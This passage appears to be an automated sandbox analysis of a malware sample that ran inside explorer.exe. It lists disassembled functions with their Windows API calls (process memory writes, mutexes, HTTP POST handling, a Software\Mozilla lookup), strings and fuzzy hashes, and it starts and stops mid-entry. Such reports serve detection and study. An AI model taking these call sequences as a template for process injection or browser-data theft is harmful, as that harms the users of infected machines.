HeapFree.KERNEL32(00000000,?,?), ref: 01553B73
HeapFree.KERNEL32(00000000,?,?), ref: 01553B88

Strings

POST, xrefs: 01553A13, 01553A2A
GET, xrefs: 01553A1A
Referer: , xrefs: 01553A81

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$AllocateEvent$Resetlstrcpy$ErrorLastlstrlen
String ID: GET$POST$Referer:
API String ID: 651731586-1105936340
Opcode ID: dfb7135f5deedd868af676c0b23dce61c8a0da8d0a5ec0a1efb9645c8eec9a34
Instruction ID: 05377fb7e31dfbed663fe28f85c903fe87664ceb97b7118f71724c001ef61036
Opcode Fuzzy Hash: dfb7135f5deedd868af676c0b23dce61c8a0da8d0a5ec0a1efb9645c8eec9a34
Instruction Fuzzy Hash: 34614734901119FFDF629FA8CC59AAEBFB5FF08350F014056E919AB260C7719A54EF90

Uniqueness

Uniqueness Score: -1,00%

Function 015474CB, Relevance: 24.2, APIs: 16, Instructions: 216memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00001000,0156E08C), ref: 015474E9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0154750C
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 01547524
GetFileAttributesA.KERNEL32(00000008,?,?,?,?,?,?,?,00000000), ref: 0154758F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 015475C3
CloseHandle.KERNEL32(?), ref: 0154772F
GetLastError.KERNEL32 ref: 01547737
HeapFree.KERNEL32(00000000,?), ref: 0154774A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorFileHeapLast$AllocateAttributesCloseCreateFreeHandle
String ID:
API String ID: 2504064324-0
Opcode ID: fbe2391fe6a0958aefba6d3babeeeea86a0250e8c0e14f55a781314fd9f6a75c
Instruction ID: 3714c701e5474f6158fe653cebeb0c196be16661b197fb907ba10f1a3545fded
Opcode Fuzzy Hash: fbe2391fe6a0958aefba6d3babeeeea86a0250e8c0e14f55a781314fd9f6a75c
Instruction Fuzzy Hash: 508117B4900209BFEF119FA8DC85DAE7F7AFF08344F018429F915AA260D7719958DFA1

Uniqueness

Uniqueness Score: -1,00%

Function 01555221, Relevance: 22.9, APIs: 15, Instructions: 364memorylibrarysynchronizationCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0155527D
CreateMutexA.KERNEL32(00000000,00000001), ref: 01555299
GetLastError.KERNEL32 ref: 015552AC

Part of subcall function 0155FA47: GetModuleHandleA.KERNEL32(0159A000), ref: 0155FA95

Part of subcall function 01569215: RtlAllocateHeap.NTDLL(00000000,00000838,0156E188), ref: 01569225
Part of subcall function 01569215: RtlInitializeCriticalSection.NTDLL(00000000), ref: 01569232

memcpy.NTDLL(01599120,00000001,00000220), ref: 01555361
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01599094,00004A28), ref: 015554C2
GetLastError.KERNEL32 ref: 015554EE
GetLastError.KERNEL32 ref: 01555538
LoadLibraryA.KERNEL32(0159A038), ref: 01555553
StrRChrA.SHLWAPI(01598FFC,00000000,0000005C), ref: 015555D5
GetCommandLineA.KERNEL32(0156EF08), ref: 0155561A
LocalFree.KERNEL32(00000000), ref: 01555647
ExitProcess.KERNEL32 ref: 0155564E

Part of subcall function 01554DA3: HeapFree.KERNEL32(00000000,?,00000125), ref: 01554E5D

RtlAllocateHeap.NTDLL(00000000,00000043), ref: 0155566F
wsprintfA.USER32 ref: 015556A0
CreateThread.KERNEL32(00000000,00000000,Function_00004E0D,00000000,00000000,?), ref: 015556BF

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CreateErrorHeapLast$AllocateFree$CommandCriticalEventExitHandleInitializeLibraryLineLoadLocalModuleMutexProcessSectionThreadmemcpymemsetwsprintf
String ID:
API String ID: 3271531361-0
Opcode ID: 1408ab56459ee0014cf86b6d433104729a5d4e7663f6cd05183b0dd9868f52ef
Instruction ID: 7b5fe1d788aa3f0d060b177b22317d56df65096cd917d92120cc29359664a3fd
Opcode Fuzzy Hash: 1408ab56459ee0014cf86b6d433104729a5d4e7663f6cd05183b0dd9868f52ef
Instruction Fuzzy Hash: 06C13570611226EFDB71DF29EC5896E3FAAFB45714713401AFA25DF204E7708448EBA2

Uniqueness

Uniqueness Score: -1,00%

Function 01569D5B, Relevance: 22.7, APIs: 15, Instructions: 230synchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01569D8E
memcpy.NTDLL(?,?,00000010), ref: 01569DB1
memset.NTDLL ref: 01569DF8
lstrcpyn.KERNEL32(?,?,00000034), ref: 01569E0A
GetLastError.KERNEL32 ref: 01569E33
GetLastError.KERNEL32(00000200), ref: 01569E87
wsprintfA.USER32 ref: 01569E94

Part of subcall function 01552158: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,01541763,?,00000000,00000000,00000000,00000006), ref: 01552176
Part of subcall function 01552158: wsprintfA.USER32 ref: 01552194

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

GetLastError.KERNEL32 ref: 01569EFE
wsprintfA.USER32 ref: 01569F24
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 01569F70
WaitForSingleObject.KERNEL32(?,00000000), ref: 01569F80
GetLastError.KERNEL32 ref: 01569FED

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

ReleaseMutex.KERNEL32(?), ref: 01569FFD

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorLast$ObjectSingleWaitwsprintf$Heap$AllocateFreeMutexReleaseSystemTimelstrcpynmemcpymemset
String ID:
API String ID: 3129781061-0
Opcode ID: abbb60b76b17259f608ed1d229a119d3e5634acb8084a9a563e0f75bb8059ae1
Instruction ID: f2387015d31ed622d42b938eca4e9d30d8526bfaa896a14b49f212484f1ee929
Opcode Fuzzy Hash: abbb60b76b17259f608ed1d229a119d3e5634acb8084a9a563e0f75bb8059ae1
Instruction Fuzzy Hash: 4D71E270505716AFE3229B24CC89A6FB7ACFF45729F020529F6269F180DB709918CBD2

Uniqueness

Uniqueness Score: -1,00%

Function 0154272F, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200memorystringprocessCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 015427BA
HeapFree.KERNEL32(00000000,00000000,0000012D), ref: 015427F9
memset.NTDLL ref: 0154282D
lstrlenW.KERNEL32 ref: 01542850
LocalAlloc.KERNEL32(00000040,?), ref: 0154285D
lstrcpyW.KERNEL32(00000000,0156E5BC), ref: 0154286B
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 015428A5
CloseHandle.KERNEL32(?), ref: 015428C3
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01542912
HeapFree.KERNEL32(00000000,00000000,0000012B), ref: 01542951

Strings

Software\Mozilla, xrefs: 015427FF
D, xrefs: 01542843

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFree$AllocCloseCreateHandleLocalProcesslstrcpylstrlenmemset
String ID: D$Software\Mozilla
API String ID: 252794982-3467357647
Opcode ID: aade01016b0318e627a5cfb477331be455ced644b5490a255fdb0fb7b5cb1489
Instruction ID: 9a823c66a4ac9d9904f93e35a29fd872afd621493d541b44949d2633174be3e2
Opcode Fuzzy Hash: aade01016b0318e627a5cfb477331be455ced644b5490a255fdb0fb7b5cb1489
Instruction Fuzzy Hash: DE615CB5505306AFE720DF64DC89D6FBBACFF84254F014929F9559B210C7309D49CBA2

Uniqueness

Uniqueness Score: -1,00%

Function 01554433, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 173stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-0000000A), ref: 01554479
memcpy.NTDLL(?,HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout,00000000), ref: 01554493

Part of subcall function 0155396C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 015539CC
Part of subcall function 0155396C: lstrcpy.KERNEL32(00000000,?), ref: 015539D9
Part of subcall function 0155396C: ResetEvent.KERNEL32(?,?,?,POST,0000EA60,?,?,?,?,?,?), ref: 01553A47
Part of subcall function 0155396C: ResetEvent.KERNEL32(?,?,?,?,?,?), ref: 01553A53
Part of subcall function 0155396C: RtlAllocateHeap.NTDLL(00000000,?), ref: 01553A79

lstrlen.KERNEL32(?), ref: 015544EF
LocalAlloc.KERNEL32(00000040,?), ref: 01554509
lstrcpy.KERNEL32(00000000,?), ref: 0155451F
LocalAlloc.KERNEL32(00000040,-0000000A), ref: 01554551
memcpy.NTDLL(?,HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout,00000000), ref: 0155456B
lstrlen.KERNEL32(HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout), ref: 01554587
LocalAlloc.KERNEL32(00000040,-0000000A), ref: 01554593
lstrlen.KERNEL32(HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout), ref: 0155459D
lstrlen.KERNEL32(HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout), ref: 015545AA
memcpy.NTDLL(?,HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout,00000000), ref: 015545B5

Strings

HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout, xrefs: 0155446B, 01554470, 0155447F, 01554486, 0155448F, 01554543, 01554548, 01554557, 0155455E, 01554567, 01554581, 01554586, 01554599, 015545A4, 015545B1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocLocallstrlen$memcpy$AllocateEventHeapResetlstrcpy
String ID: HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout
API String ID: 1813062636-2598440336
Opcode ID: 6cca84bdaac6ddcbbee00edebd10d179166e70686dfbbc6269ffc133250817a3
Instruction ID: be305a491064aa43db7b5c0d2c658d8e1d2973da610112ddc06016e9370528e4
Opcode Fuzzy Hash: 6cca84bdaac6ddcbbee00edebd10d179166e70686dfbbc6269ffc133250817a3
Instruction Fuzzy Hash: A4518AB5900201EFDB60DF68D885E6ABBB9FF85714B09805AFD499F225D730DC80DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 015533D2, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout,00000000,00000000,00000000,?,?,0155361F,?,?,?,01598FD4,?,?,01546B11,?,?), ref: 015533FF
GetLastError.KERNEL32(?,?,0155361F,?,?,?,01598FD4,?,?,01546B11,?,?), ref: 01553442
SetEvent.KERNEL32(?,0000EA60,?,?,0155361F,?,?,?,01598FD4,?,?,01546B11,?,?), ref: 01553463
lstrlen.KERNEL32(?,00000000,00000000,?,?,0155361F,?,?,?,01598FD4,?,?,01546B11,?,?), ref: 01553495
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 015534A4
lstrcpy.KERNEL32(00000000,?), ref: 015534B3

Strings

Content-Length:, xrefs: 01553525
POST, xrefs: 01553428
HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout, xrefs: 015533F9, 015533FE, 01553406
Transfer-Encoding:, xrefs: 0155354B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: lstrlen$AllocateErrorEventHeapLastlstrcpy
String ID: Content-Length:$HTTP/1.1 502 Bad GatewayContent-Length: 19502 Gateway Timeout$POST$Transfer-Encoding:
API String ID: 1927936677-4199437886
Opcode ID: 26c65c3dccb6326337c7c5679b094df589899a78c8dc950e412e89109103d4c1
Instruction ID: 8ebf02ced75427c379d10d6bdab45c42811b72dba5be3133e2cfaf432d4473be
Opcode Fuzzy Hash: 26c65c3dccb6326337c7c5679b094df589899a78c8dc950e412e89109103d4c1
Instruction Fuzzy Hash: 9F519A75201206BFD7A1AF69CC89D2BBBA9FB49790B010425F9059B621CB31EC14DBB1

Uniqueness

Uniqueness Score: -1,00%

Function 01557630, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0155764A
memset.NTDLL ref: 0155765A
memset.NTDLL ref: 0155766A
GetTickCount.KERNEL32(?,?,0159A46D,?,00000000,?,?), ref: 015576FA
RtlAllocateHeap.NTDLL(00000000,?), ref: 0155777B
memcpy.NTDLL(01598BA8,?,?), ref: 015577B0
memcpy.NTDLL(01598BA8,?,00000000,01598BA8,?,?), ref: 015577C2
GetLastError.KERNEL32 ref: 015577FF
GetLastError.KERNEL32(?,?,0159A46D,?,00000000,?,?), ref: 01557816
HeapFree.KERNEL32(00000000,?,?), ref: 01557829

Strings

POST, xrefs: 015576DE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memset$ErrorHeapLastmemcpy$AllocateCountFreeTick
String ID: POST
API String ID: 226004759-1814004025
Opcode ID: ae8dbf2faa5ccc5354afbad9b88ddff638e8cfa565934c6ecfddad8bc28fd2f8
Instruction ID: 2bb3ab784c4a6a103855ccd6c90482e271df0c8b00a67167053c75afa6f472f0
Opcode Fuzzy Hash: ae8dbf2faa5ccc5354afbad9b88ddff638e8cfa565934c6ecfddad8bc28fd2f8
Instruction Fuzzy Hash: 28516971500209AFEF219FA9CC85EEE3BADFB88314F114426F925DB261DA30D548DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01541BBB, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127memorystringthreadCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 01541C04
GetCurrentThreadId.KERNEL32 ref: 01541C1A
GetCurrentThread.KERNEL32 ref: 01541C27
lstrcpy.KERNEL32(01598960,000000FF), ref: 01541CD6

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

Part of subcall function 01541B19: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?), ref: 01541B84
Part of subcall function 01541B19: HeapFree.KERNEL32(00000000,00000000), ref: 01541BAC

HeapFree.KERNEL32(00000000,?,00000D80), ref: 01541CA6
HeapFree.KERNEL32(00000000,00000228,00000D80), ref: 01541CB6
RtlAllocateHeap.NTDLL(00000000,00000400), ref: 01541D1D
wsprintfA.USER32 ref: 01541D2E
lstrlen.KERNEL32(00000000,00000000), ref: 01541D39
HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 01541D53

Strings

W, xrefs: 01541D0A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$CurrentThreadlstrcpylstrlen$AllocateCountFileHeaderImageNameTempTickwsprintf
String ID: W
API String ID: 2905454612-655174618
Opcode ID: 62d3c9319056fd9a5937073c4a9f59a31adad8436a3de834dca4c81769bfbc62
Instruction ID: 42c044d42dfe9f50e198bca1d8c239a40cdcd8e67814ecb408511dc5dd80b575
Opcode Fuzzy Hash: 62d3c9319056fd9a5937073c4a9f59a31adad8436a3de834dca4c81769bfbc62
Instruction Fuzzy Hash: C141F074900609FFCB20AFA8EC88DAE7FB9FF85308F114429F9659B111D730A588DB61

Uniqueness

Uniqueness Score: -1,00%

Function 0154731F, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00000000,00000000,00000000,?,01542F91,00000000), ref: 0154732F
CreateFileW.KERNEL32(01542F91,80000000,00000003,01599084,00000003,00000000,00000000), ref: 0154734C
GetLastError.KERNEL32(?,01542F91,00000000), ref: 015473ED

Part of subcall function 01561BCE: lstrlen.KERNEL32(0159A422,00000000,0154736D,00000027,01599084,?,00000000,?,?,0154736D,0159A422,00000001,?,01542F91,00000000), ref: 01561C04
Part of subcall function 01561BCE: lstrcpy.KERNEL32(00000000,00000000), ref: 01561C28
Part of subcall function 01561BCE: lstrcat.KERNEL32(00000000,00000000), ref: 01561C30

GetFileSize.KERNEL32(01542F91,00000000,0159A422,00000001,?,01542F91,00000000), ref: 01547378
CreateFileMappingA.KERNEL32(01542F91,01599084,00000002,00000000,00000000,01542F91), ref: 0154738C
lstrlen.KERNEL32(01542F91,?,01542F91,00000000), ref: 015473A8
lstrcpy.KERNEL32(?,01542F91), ref: 015473B8
GetLastError.KERNEL32(?,01542F91,00000000), ref: 015473C0
HeapFree.KERNEL32(00000000,01542F91), ref: 015473D3
CloseHandle.KERNEL32(01542F91), ref: 015473E5

Strings

Local\, xrefs: 01547360

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: 88fc4ef5dd4248e67e363e2db3f439a05bbd86dbf256fc09f9c96fac07703c59
Instruction ID: 5ad6f851322da4b3d8444c62f09b0f33a766dcd30add787bf6916d8e9621af69
Opcode Fuzzy Hash: 88fc4ef5dd4248e67e363e2db3f439a05bbd86dbf256fc09f9c96fac07703c59
Instruction Fuzzy Hash: C6214174901208FFDB209FA8D88A99D7FB5FB04354F118469F915EB260D7714E48DB91

Uniqueness

Uniqueness Score: -1,00%

Function 01545E0D, Relevance: 18.5, APIs: 12, Instructions: 497synchronizationmemorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0154566C: CreateEventA.KERNEL32(01599084,00000001,00000000), ref: 015456E0

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0154609D

Part of subcall function 01545525: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0154553C
Part of subcall function 01545525: CreateWaitableTimerA.KERNEL32(01599084,?,?), ref: 0154555B
Part of subcall function 01545525: GetLastError.KERNEL32 ref: 0154556B
Part of subcall function 01545525: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 015455B2
Part of subcall function 01545525: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 015455E6

WaitForMultipleObjects.KERNEL32(01598881,?,00000000,000000FF), ref: 01546139
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 015461DC
HeapFree.KERNEL32(00000000,?,0159A23D), ref: 015461ED
HeapFree.KERNEL32(00000000,?,?), ref: 015462F6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01546357
ReleaseMutex.KERNEL32(?), ref: 01546374
SwitchToThread.KERNEL32 ref: 015463C1
ReleaseMutex.KERNEL32(?), ref: 015463CB
SwitchToThread.KERNEL32 ref: 01546441
ReleaseMutex.KERNEL32(?), ref: 0154644B
WaitForSingleObject.KERNEL32(?,00000000), ref: 0154645B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeap$CreateMutexReleaseWait$EventMultipleObjectsSwitchThreadTimeTimerWaitable$ErrorFileLastObjectOpenSingleSystem
String ID:
API String ID: 4182580320-0
Opcode ID: 52faa91b4953a6754d66f37b7d5cc82a10d1407ac27c17aa0fdb287395298ca1
Instruction ID: e86f9ff6dab70c3a0a4f7e4d019784419c400686339c4d3badb0c32d5bd51886
Opcode Fuzzy Hash: 52faa91b4953a6754d66f37b7d5cc82a10d1407ac27c17aa0fdb287395298ca1
Instruction Fuzzy Hash: 5102CD71109315AFDB219F69CC84A6FBFE9FF86764F050919F2A48A164D730C848DBA3

Uniqueness

Uniqueness Score: -1,00%

Function 01555866, Relevance: 18.2, APIs: 12, Instructions: 208filememorytimeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 015558CD
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015558FF
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01555913
CloseHandle.KERNEL32(?), ref: 0155592A
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01555936
lstrcat.KERNEL32(?,0159B65B), ref: 01555970
FindNextFileA.KERNEL32(?,?), ref: 015559B8
memcpy.NTDLL(?,?,00000000), ref: 01555A5F
FindNextFileA.KERNEL32(?,?), ref: 01555A74
CompareFileTime.KERNEL32(?,?), ref: 01555A9D
HeapFree.KERNEL32(00000000,?), ref: 01555AD3
HeapFree.KERNEL32(00000000,?), ref: 01555AE3

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpymemset
String ID:
API String ID: 293928577-0
Opcode ID: 4ba66b060721e21bb3004695053a4d7c53771723f7ab80c15e00eaf947f259df
Instruction ID: 9fbf1f2d08df9f6918af691617694e55c84d35e85dbf0c090520fbb42856ebc7
Opcode Fuzzy Hash: 4ba66b060721e21bb3004695053a4d7c53771723f7ab80c15e00eaf947f259df
Instruction Fuzzy Hash: 0A815C71D00219EFDB21DFA9DC85AEEBBB9FB44301F110466E515EB250E7709A48DFA0

Uniqueness

Uniqueness Score: -1,00%

Function 01541017, Relevance: 18.1, APIs: 12, Instructions: 147filestringinjectionCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 01541030
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01541052
CreateFileMappingA.KERNEL32(00000000,00000000,01000002,00000000,00000000,00000000), ref: 01541070
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 01541089
RtlImageDirectoryEntryToData.NTDLL(?,00000001,00000000,?), ref: 015410AD
memcmp.NTDLL ref: 01541109
lstrcmp.KERNEL32(?,0159B34C), ref: 01541132
lstrcmp.KERNEL32(?,0159B361), ref: 01541142
lstrcmpi.KERNEL32(00000000), ref: 0154118A
GetCurrentProcess.KERNEL32(?,00000000,0000000A,?), ref: 015411A7
WriteProcessMemory.KERNEL32(00000000), ref: 015411AE
UnmapViewOfFile.KERNEL32(?,?,00000001,00000000,?), ref: 015411C9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CreateProcessViewlstrcmp$CurrentDataDirectoryEntryImageMappingMemoryModuleNameUnmapWritelstrcmpimemcmp
String ID:
API String ID: 2315924138-0
Opcode ID: 97644fb10cb9ecd8b62db65d463e5ca97fcef1d7b706fed14840f36995c9d66e
Instruction ID: c5e9c89bec08a5d2839df6b83472ebee5480a6d64a52f1099d3a4ba6e9962a76
Opcode Fuzzy Hash: 97644fb10cb9ecd8b62db65d463e5ca97fcef1d7b706fed14840f36995c9d66e
Instruction Fuzzy Hash: 49518175900604EBEF20DFA9CC89FAEBBB8FF45724F100155F515AB290D730AA84CBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01555AF3, Relevance: 18.1, APIs: 12, Instructions: 125memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0159900C,0156E0AC), ref: 01555B1F
memcpy.NTDLL(00000000,01598A4C), ref: 01555B42
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 01555B89
GetLastError.KERNEL32 ref: 01555BC5
SetEndOfFile.KERNEL32(00000000), ref: 01555BD0
CloseHandle.KERNEL32(00000000), ref: 01555BD7
GetLastError.KERNEL32 ref: 01555BE3
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 01555C09
GetLastError.KERNEL32 ref: 01555C26
FlushFileBuffers.KERNEL32(00000000), ref: 01555C31
GetLastError.KERNEL32 ref: 01555C39
HeapFree.KERNEL32(00000000,00000000), ref: 01555C4C

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorFileLast$CreateHeap$AllocateBuffersCloseFlushFreeHandlememcpy
String ID:
API String ID: 3007450500-0
Opcode ID: 2f304150d0f6bd5390b51cba0daab7b6e78d2c1c2e216c6231524bc68a3a0f45
Instruction ID: ec14c2777b8bfa63801f18affa702fa4fae129c1bebb41673f7d39f74624b38b
Opcode Fuzzy Hash: 2f304150d0f6bd5390b51cba0daab7b6e78d2c1c2e216c6231524bc68a3a0f45
Instruction Fuzzy Hash: D441F375101315AFE360DE28DC49FAE3BACFB44764F020525FA61CA2A4E771894D9BE2

Uniqueness

Uniqueness Score: -1,00%

Function 0154FF66, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 492memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0154F5E3: lstrlen.KERNEL32(?,?,00000000,?,01546727,00000000), ref: 0154F5EF

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01550042
lstrlen.KERNEL32(?,?,?,?,00000000,00000000,?,?), ref: 01550107

Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0154FA79
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0154FA92
Part of subcall function 0154FA44: HeapFree.KERNEL32(00000000,?), ref: 0154FAFF
Part of subcall function 0154FA44: HeapFree.KERNEL32(00000000,?), ref: 0154FB0F
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB22
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB35

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01550243
memcpy.NTDLL(?,?,?,?,?), ref: 0155027E
lstrlen.KERNEL32(?,?,?,?,?), ref: 0155038F
HeapFree.KERNEL32(00000000,?,?), ref: 015503C3
HeapFree.KERNEL32(00000000,00000000,00000006), ref: 015503F3
HeapFree.KERNEL32(00000000,?), ref: 0155049E

Part of subcall function 0154FF66: HeapFree.KERNEL32(00000000,?,00000000), ref: 015504E8

Strings

, xrefs: 01550456

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFree$lstrlen$memcpy
String ID:
API String ID: 3708300815-3916222277
Opcode ID: 40c8b10779a696b11da32d5206eae7436de1f529e81afdfe26e42480749e284f
Instruction ID: c455a0b96e58582389be54ec351b05c2dd41fb5625abfb35e9ba686f75560ec7
Opcode Fuzzy Hash: 40c8b10779a696b11da32d5206eae7436de1f529e81afdfe26e42480749e284f
Instruction Fuzzy Hash: 5102F731D0021AEFDF21DFA9CC44CAEBFB9FF89704F18445AE921AA160D7319A51DB61

Uniqueness

Uniqueness Score: -1,00%

Function 01562E51, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 186timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01562E8B
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 01562EB6
memset.NTDLL ref: 01562F13
memset.NTDLL ref: 01562F7B

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01562FEC
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 01563008
CloseHandle.KERNEL32(?), ref: 01563065

Strings

vids, xrefs: 01562F92
vids, xrefs: 01562F58, 01562F5C
MSVC, xrefs: 01562F9A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

